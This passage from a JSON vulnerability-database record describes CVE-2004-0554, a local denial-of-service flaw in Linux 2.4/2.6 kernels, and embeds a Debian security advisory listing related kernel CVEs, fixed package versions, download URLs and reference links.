    "data": "Linux kernel 2.4.x and 2.6.x for x86 allows local users to cause a denial of service (system crash), possibly via an infinite loop that triggers a signal handler with a certain sequence of fsave and frstor instructions, as originally demonstrated using a \"crash.c\" program. The Linux kernel contains a denial-of-service vulnerability that allows local users to disable affected hosts. Linux Kernel Stores the process state of the floating point unit / Used to restore FSAVE/FRSTOR There are deficiencies in the handling of instructions. This issue is due to a design error that causes the kernel to fail to properly handle floating-point exceptions. \nThis issue may be leveraged by an attacker to cause the affected system to crash, denying service to legitimate users. \nAlthough only select Linux kernels are reported to be affected, it is likely that various other versions are vulnerable as well. These issues were found during a recent audit of the Linux kernel source. \nThe following drivers are reportedly affected by these issues:\naironet\nasus_acpi\ndecnet\nmpu401\nmsnd\npss\nThese issues may reportedly allow attackers to access kernel memory or gain escalated privileges on the affected computer. Local attackers can exploit these vulnerabilities to elevate privileges or conduct denial-of-service attacks on the system. The affected device drivers are: aironet, asus_acpi, decnet, mpu401, msnd, and pss. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1069-1                    security@debian.org\nhttp://www.debian.org/security/               Martin Schulze, Dann Frazier\nMay 20th, 2006                          http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage        : kernel-source-2.4.18,kernel-image-2.4.18-1-alpha,kernel-image-2.4.18-1-i386,kernel-image-2.4.18-hppa,kernel-image-2.4.18-powerpc-xfs,kernel-patch-2.4.18-powerpc,kernel-patch-benh\nVulnerability  : several\nProblem-Type   : local/remote\nDebian-specific: no\nCVE IDs        : CVE-2004-0427 CVE-2005-0489 CVE-2004-0394 CVE-2004-0447 CVE-2004-0554 CVE-2004-0565 CVE-2004-0685  CVE-2005-0001 CVE-2004-0883 CVE-2004-0949 CVE-2004-1016 CVE-2004-1333 CVE-2004-0997 CVE-2004-1335 CVE-2004-1017 CVE-2005-0124 CVE-2005-0528 CVE-2003-0984 CVE-2004-1070 CVE-2004-1071 CVE-2004-1072 CVE-2004-1073 CVE-2004-1074 CVE-2004-0138 CVE-2004-1068 CVE-2004-1234 CVE-2005-0003 CVE-2004-1235 CVE-2005-0504 CVE-2005-0384 CVE-2005-0135\n\nSeveral local and remote vulnerabilities have been discovered in the Linux\nkernel that may lead to a denial of service or the execution of arbitrary\ncode. \n\n CVE-2004-0394\n\n     A buffer overflow in the panic handling code has been found. \n\n CVE-2004-0565\n\n     An information leak in the context switch code has been found on\n     the IA64 architecture. \n\n CVE-2004-0685\n\n     Unsafe use of copy_to_user in USB drivers may disclose sensitive\n     information. \n\n CVE-2005-0001\n\n     A race condition in the i386 page fault handler may allow privilege\n     escalation. \n\n CVE-2004-0883\n\n     Multiple vulnerabilities in the SMB filesystem code may allow denial\n     of service of information disclosure. \n\n CVE-2004-0949\n\n     An information leak discovered in the SMB filesystem code. \n\n CVE-2004-0997\n\n     A local privilege escalation in the MIPS assembly code has been found. \n \n CVE-2004-1335\n \n     A memory leak in the ip_options_get() function may lead to denial of\n     service. \n      \n CVE-2004-1017\n\n     Multiple overflows exist in the io_edgeport driver which might be usable\n     as a denial of service attack vector. \n \n CVE-2005-0124\n\n     Bryan Fulton reported a bounds checking bug in the coda_pioctl function\n     which may allow local users to execute arbitrary code or trigger a denial\n     of service attack. \n\n CVE-2005-0528\n\n     A local privilege escalation in the mremap function has been found\n\n CVE-2003-0984\n\n     Inproper initialization of the RTC may disclose information. \n\n CVE-2004-1070\n\n     Insufficient input sanitising in the load_elf_binary() function may\n     lead to privilege escalation. \n\n CVE-2004-1071\n\n     Incorrect error handling in the binfmt_elf loader may lead to privilege\n     escalation. \n\n CVE-2004-1072\n\n     A buffer overflow in the binfmt_elf loader may lead to privilege\n     escalation or denial of service. \n\n CVE-2004-1073\n\n     The open_exec function may disclose information. \n\n CVE-2004-1074\n\n     The binfmt code is vulnerable to denial of service through malformed\n     a.out binaries. \n\n CVE-2004-1068\n\n     A programming error in the unix_dgram_recvmsg() function may lead to\n     privilege escalation. \n\n CVE-2004-1234\n\n     The ELF loader is vulnerable to denial of service through malformed\n     binaries. \n\n CVE-2005-0003\n\n     Crafted ELF binaries may lead to privilege escalation, due to \n     insufficient checking of overlapping memory regions. \n\n CVE-2004-1235\n\n     A race condition in the load_elf_library() and binfmt_aout() functions\n     may allow privilege escalation. \n\n CVE-2005-0504\n\n     An integer overflow in the Moxa driver may lead to privilege escalation. \n\nThe following matrix explains which kernel version for which architecture\nfix the problems mentioned above:\n\n                                     Debian 3.0 (woody)\n     Source                          2.4.18-14.4\n     Alpha architecture              2.4.18-15woody1\n     Intel IA-32 architecture        2.4.18-13.2\n     HP Precision architecture       62.4 \n     PowerPC architecture            2.4.18-1woody6\n     PowerPC architecture/XFS        20020329woody1            \n     PowerPC architecture/benh       20020304woody1\n     Sun Sparc architecture          22woody1    \n\nWe recommend that you upgrade your kernel package immediately and reboot\nthe machine. \n\nUpgrade Instructions\n- --------------------\n\nwget url\n        will fetch the file for you\ndpkg -i file.deb\n        will install the referenced file. \n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n        will update the internal database\napt-get dist-upgrade\n        will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration. \n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n\n  These files will probably be moved into the stable distribution on\n  its next update. \n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show \u003cpkg\u003e\u0027 and http://packages.debian.org/\u003cpkg\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.3 (GNU/Linux)\n\niD8DBQFEb9YGXm3vHE4uyloRAkhXAJ0e1RmUxVZSbQICFa/j07oKPfWRVwCeMrhj\nwYGegwosZg6xi3oI77opLQY=\n=eu/T\n-----END PGP SIGNATURE-----\n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n. \n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n  Source archives:\n\n    http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-sparc-2.4_26woody1.dsc\n      Size/MD5 checksum:      692 27f44a0eec5837b0b01d26c6cff392be\n    http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-sparc-2.4_26woody1.tar.gz\n      Size/MD5 checksum:    27768 6c719a6343c9ea0dad44a736b3842504\n    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody5.dsc\n      Size/MD5 checksum:      792 d7c89c90fad77944ca1c5a18327f31dd\n    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody5.tar.gz\n      Size/MD5 checksum:  1013866 21b4b677a7a319442c8fe8a4c72eb4c2\n    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody3.dsc\n      Size/MD5 checksum:      672 4c353db091e8edc4395e46cf8d39ec42\n    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody3.diff.gz\n      Size/MD5 checksum:    71071 7012adde9ba9a573e1be66f0d258721a\n    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19.orig.tar.gz\n      Size/MD5 checksum: 32000211 237896fbb45ae652cc9c5cecc9b746da\n\n  Architecture independent components:\n\n    http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-headers-2.4.18-sparc_22woody1_all.deb\n      Size/MD5 checksum:  1521850 75d23c7c54094b1d25d3b708fd644407\n    http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-headers-2.4.19-sparc_26woody1_all.deb\n      Size/MD5 checksum:  1547874 c6881b25e3a5967e0f6f9c351fb88962\n    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody5_all.deb\n      Size/MD5 checksum:  1014564 0e89364c2816f5f4519256a8ea367ab6\n    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-doc-2.4.19_2.4.19-4.woody3_all.deb\n      Size/MD5 checksum:  1785490 c66cef9e87d9a89caeee02af31e3c96d\n    http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody3_all.deb\n      Size/MD5 checksum: 25902158 321403201a198371fd55c9b8ac4583f7\n\n  Sun Sparc architecture:\n\n    http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.18-sun4u_22woody1_sparc.deb\n      Size/MD5 checksum:  3923058 db7bbd997410667bec4ac713d81d60ea\n    http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.18-sun4u-smp_22woody1_sparc.deb\n      Size/MD5 checksum:  4044796 106fcb86485531d96b4fdada61b71405\n    http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.19-sun4u_26woody1_sparc.deb\n      Size/MD5 checksum:  3831424 347b0c290989f0cc99f3b336c156f61d\n    http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.19-sun4u-smp_26woody1_sparc.deb\n      Size/MD5 checksum:  3952220 f7dd8326c0ae0b0dee7c46e24023d0a2\n\n  Big endian MIPS architecture:\n\n    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-headers-2.4.19_2.4.19-0.020911.1.woody5_mips.deb\n      Size/MD5 checksum:  3890804 7348a8cd3961190aa2a19f562c96fe2f\n    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-image-2.4.19-r4k-ip22_2.4.19-0.020911.1.woody5_mips.deb\n      Size/MD5 checksum:  2080618 d52d00e7097ae0c8f4ccb6f34656361d\n    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-image-2.4.19-r5k-ip22_2.4.19-0.020911.1.woody5_mips.deb\n      Size/MD5 checksum:  2080830 db7141d3c0d86a43659176f974599cc2\n    http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/mips-tools_2.4.19-0.020911.1.woody5_mips.deb\n      Size/MD5 checksum:    15816 c31e3b72d6eac6f3f99f75ea838e0bf9\n\n  These files will probably be moved into the stable distribution on\n  its next update",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2004-0554"
      },
      {
        "db": "CERT/CC",
        "id": "VU#973654"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000225"
      },
      {
        "db": "BID",
        "id": "10538"
      },
      {
        "db": "BID",
        "id": "10566"
      },
      {
        "db": "VULHUB",
        "id": "VHN-8984"
      },
      {
        "db": "PACKETSTORM",
        "id": "46506"
      },
      {
        "db": "PACKETSTORM",
        "id": "46508"
      },
      {
        "db": "PACKETSTORM",
        "id": "46509"
      }
    ],
    "trust": 3.24
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-8984",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-8984"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2004-0554",
        "trust": 3.4
      },
      {
        "db": "CERT/CC",
        "id": "VU#973654",
        "trust": 3.3
      },
      {
        "db": "BID",
        "id": "10538",
        "trust": 2.8
      },
      {
        "db": "SECUNIA",
        "id": "20202",
        "trust": 1.7
      },
      {
        "db": "SECUNIA",
        "id": "20338",
        "trust": 1.7
      },
      {
        "db": "SECUNIA",
        "id": "20162",
        "trust": 1.7
      },
      {
        "db": "SECUNIA",
        "id": "20163",
        "trust": 1.7
      },
      {
        "db": "SECUNIA",
        "id": "11861",
        "trust": 1.6
      },
      {
        "db": "XF",
        "id": "16412",
        "trust": 1.4
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000225",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-053",
        "trust": 0.7
      },
      {
        "db": "DEBIAN",
        "id": "DSA-1069",
        "trust": 0.6
      },
      {
        "db": "DEBIAN",
        "id": "DSA-1070",
        "trust": 0.6
      },
      {
        "db": "DEBIAN",
        "id": "DSA-1082",
        "trust": 0.6
      },
      {
        "db": "DEBIAN",
        "id": "DSA-1067",
        "trust": 0.6
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2004:255",
        "trust": 0.6
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2004:260",
        "trust": 0.6
      },
      {
        "db": "MANDRAKE",
        "id": "MDKSA-2004:062",
        "trust": 0.6
      },
      {
        "db": "CONECTIVA",
        "id": "CLA-2004:845",
        "trust": 0.6
      },
      {
        "db": "BUGTRAQ",
        "id": "20040620 TSSA-2004-011 - KERNEL",
        "trust": 0.6
      },
      {
        "db": "OVAL",
        "id": "OVAL:ORG.MITRE.OVAL:DEF:9426",
        "trust": 0.6
      },
      {
        "db": "OVAL",
        "id": "OVAL:ORG.MITRE.OVAL:DEF:2915",
        "trust": 0.6
      },
      {
        "db": "SUSE",
        "id": "SUSE-SA:2004:017",
        "trust": 0.6
      },
      {
        "db": "TRUSTIX",
        "id": "2004-0034",
        "trust": 0.6
      },
      {
        "db": "FEDORA",
        "id": "FEDORA-2004-186",
        "trust": 0.6
      },
      {
        "db": "GENTOO",
        "id": "GLSA-200407-02",
        "trust": 0.6
      },
      {
        "db": "ENGARDE",
        "id": "ESA-20040621-005",
        "trust": 0.6
      },
      {
        "db": "MLIST",
        "id": "[LINUX-KERNEL] 20040609 TIMER + FPU STUFF LOCKS MY CONSOLE RACE",
        "trust": 0.6
      },
      {
        "db": "BID",
        "id": "10566",
        "trust": 0.3
      },
      {
        "db": "EXPLOIT-DB",
        "id": "306",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-8984",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "46506",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "46508",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "46509",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#973654"
      },
      {
        "db": "VULHUB",
        "id": "VHN-8984"
      },
      {
        "db": "BID",
        "id": "10538"
      },
      {
        "db": "BID",
        "id": "10566"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000225"
      },
      {
        "db": "PACKETSTORM",
        "id": "46506"
      },
      {
        "db": "PACKETSTORM",
        "id": "46508"
      },
      {
        "db": "PACKETSTORM",
        "id": "46509"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200408-053"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0554"
      }
    ]
  },
  "id": "VAR-200406-0158",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-8984"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-07-23T19:28:41.684000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "kernel_30",
        "trust": 0.8,
        "url": "http://www.miraclelinux.com/support/update/data/kernel_30.html"
      },
      {
        "title": "kernel_se20",
        "trust": 0.8,
        "url": "http://www.miraclelinux.com/support/update/data/kernel_se20.html"
      },
      {
        "title": "RHSA-2004:260",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2004-260.html"
      },
      {
        "title": "RHSA-2004:255",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2004-255.html"
      },
      {
        "title": "TLSA-2004-18",
        "trust": 0.8,
        "url": "http://www.turbolinux.com/security/2004/tlsa-2004-18.txt"
      },
      {
        "title": "RHSA-2004:260",
        "trust": 0.8,
        "url": "http://www.jp.redhat.com/support/errata/rhsa/rhsa-2004-260j.html"
      },
      {
        "title": "RHSA-2004:255",
        "trust": 0.8,
        "url": "http://www.jp.redhat.com/support/errata/rhsa/rhsa-2004-255j.html"
      },
      {
        "title": "TLSA-2004-18",
        "trust": 0.8,
        "url": "http://www.turbolinux.co.jp/security/2004/tlsa-2004-18j.txt"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000225"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-Other",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2004-0554"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.8,
        "url": "http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html"
      },
      {
        "trust": 2.5,
        "url": "http://www.securityfocus.com/bid/10538"
      },
      {
        "trust": 2.5,
        "url": "http://www.kb.cert.org/vuls/id/973654"
      },
      {
        "trust": 1.7,
        "url": "http://www.debian.org/security/2006/dsa-1067"
      },
      {
        "trust": 1.7,
        "url": "http://www.debian.org/security/2006/dsa-1069"
      },
      {
        "trust": 1.7,
        "url": "http://www.debian.org/security/2006/dsa-1070"
      },
      {
        "trust": 1.7,
        "url": "http://www.debian.org/security/2006/dsa-1082"
      },
      {
        "trust": 1.7,
        "url": "http://lwn.net/articles/91155/"
      },
      {
        "trust": 1.7,
        "url": "http://security.gentoo.org/glsa/glsa-200407-02.xml"
      },
      {
        "trust": 1.7,
        "url": "http://www.mandriva.com/security/advisories?name=mdksa-2004:062"
      },
      {
        "trust": 1.7,
        "url": "http://gcc.gnu.org/bugzilla/show_bug.cgi?id=15905"
      },
      {
        "trust": 1.7,
        "url": "http://www.redhat.com/support/errata/rhsa-2004-255.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.redhat.com/support/errata/rhsa-2004-260.html"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/20162"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/20163"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/20202"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/20338"
      },
      {
        "trust": 1.7,
        "url": "http://www.novell.com/linux/security/advisories/2004_17_kernel.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.trustix.net/errata/2004/0034/"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/11861/"
      },
      {
        "trust": 1.6,
        "url": "http://distro.conectiva.com.br/atualizacoes/?id=a\u0026anuncio=000845"
      },
      {
        "trust": 1.4,
        "url": "http://xforce.iss.net/xforce/xfdb/16412"
      },
      {
        "trust": 1.1,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a2915"
      },
      {
        "trust": 1.1,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a9426"
      },
      {
        "trust": 1.1,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/16412"
      },
      {
        "trust": 1.0,
        "url": "http://marc.info/?l=bugtraq\u0026m=108786114032681\u0026w=2"
      },
      {
        "trust": 1.0,
        "url": "http://marc.info/?l=bugtraq\u0026m=108793699910896\u0026w=2"
      },
      {
        "trust": 1.0,
        "url": "http://marc.info/?l=linux-kernel\u0026m=108681568931323\u0026w=2"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2004-0554"
      },
      {
        "trust": 0.8,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2004-0554"
      },
      {
        "trust": 0.6,
        "url": "http://rhn.redhat.com/errata/rhsa-2004-255.html"
      },
      {
        "trust": 0.6,
        "url": "http://oval.mitre.org/repository/data/getdef?id=oval:org.mitre.oval:def:9426"
      },
      {
        "trust": 0.6,
        "url": "http://marc.theaimsgroup.com/?l=linux-kernel\u0026m=108681568931323\u0026w=2"
      },
      {
        "trust": 0.6,
        "url": "http://marc.theaimsgroup.com/?l=bugtraq\u0026m=108793699910896\u0026w=2"
      },
      {
        "trust": 0.6,
        "url": "http://marc.theaimsgroup.com/?l=bugtraq\u0026m=108786114032681\u0026w=2"
      },
      {
        "trust": 0.6,
        "url": "http://oval.mitre.org/repository/data/getdef?id=oval:org.mitre.oval:def:2915"
      },
      {
        "trust": 0.3,
        "url": "http://rhn.redhat.com/errata/rhsa-2004-260.html"
      },
      {
        "trust": 0.3,
        "url": "http://rhn.redhat.com/errata/rhsa-2004-327.html"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2005-0489"
      },
      {
        "trust": 0.3,
        "url": "http://www.debian.org/security/faq"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0394"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0427"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0554"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0447"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2005-0124"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2005-0001"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0997"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0565"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-1333"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2003-0984"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0949"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0883"
      },
      {
        "trust": 0.3,
        "url": "http://packages.debian.org/\u003cpkg\u003e"
      },
      {
        "trust": 0.3,
        "url": "http://security.debian.org/"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0685"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-1016"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2005-0528"
      },
      {
        "trust": 0.3,
        "url": "http://www.debian.org/security/"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-1017"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-1335"
      },
      {
        "trust": 0.2,
        "url": "http://secunia.com/"
      },
      {
        "trust": 0.2,
        "url": "http://lists.grok.org.uk/full-disclosure-charter.html"
      },
      {
        "trust": 0.1,
        "url": "http://marc.info/?l=bugtraq\u0026amp;m=108786114032681\u0026amp;w=2"
      },
      {
        "trust": 0.1,
        "url": "http://distro.conectiva.com.br/atualizacoes/?id=a\u0026amp;anuncio=000845"
      },
      {
        "trust": 0.1,
        "url": "http://marc.info/?l=bugtraq\u0026amp;m=108793699910896\u0026amp;w=2"
      },
      {
        "trust": 0.1,
        "url": "http://marc.info/?l=linux-kernel\u0026amp;m=108681568931323\u0026amp;w=2"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.16/kernel-doc-2.4.16_2.4.16-1woody3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-netwinder/kernel-image-2.4.16-netwinder_20040419woody1.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-riscpc/kernel-image-2.4.16-riscpc_20040419woody1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.16/kernel-source-2.4.16_2.4.16-1woody3.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-lart/kernel-image-2.4.16-lart_20040419woody1.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.16/kernel-source-2.4.16_2.4.16.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-netwinder/kernel-image-2.4.16-netwinder_20040419woody1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-netwinder/kernel-headers-2.4.16_20040419woody1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.16/kernel-source-2.4.16_2.4.16-1woody3.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-riscpc/kernel-image-2.4.16-riscpc_20040419woody1.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.16/kernel-source-2.4.16_2.4.16-1woody3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-netwinder/kernel-image-2.4.16-netwinder_20040419woody1.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-riscpc/kernel-image-2.4.16-riscpc_20040419woody1.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-lart/kernel-image-2.4.16-lart_20040419woody1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-2.4.16-lart/kernel-image-2.4.16-lart_20040419woody1.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-image-2.4.19-r5k-ip22_2.4.19-0.020911.1.woody5_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody5.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody3.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-doc-2.4.19_2.4.19-4.woody3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-sparc-2.4_26woody1.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.19-sun4u_26woody1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/mips-tools_2.4.19-0.020911.1.woody5_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-sparc-2.4_26woody1.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody5_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody3.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-image-2.4.19-r4k-ip22_2.4.19-0.020911.1.woody5_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-headers-2.4.18-sparc_22woody1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.18-sun4u-smp_22woody1_sparc.deb"
      },
      {
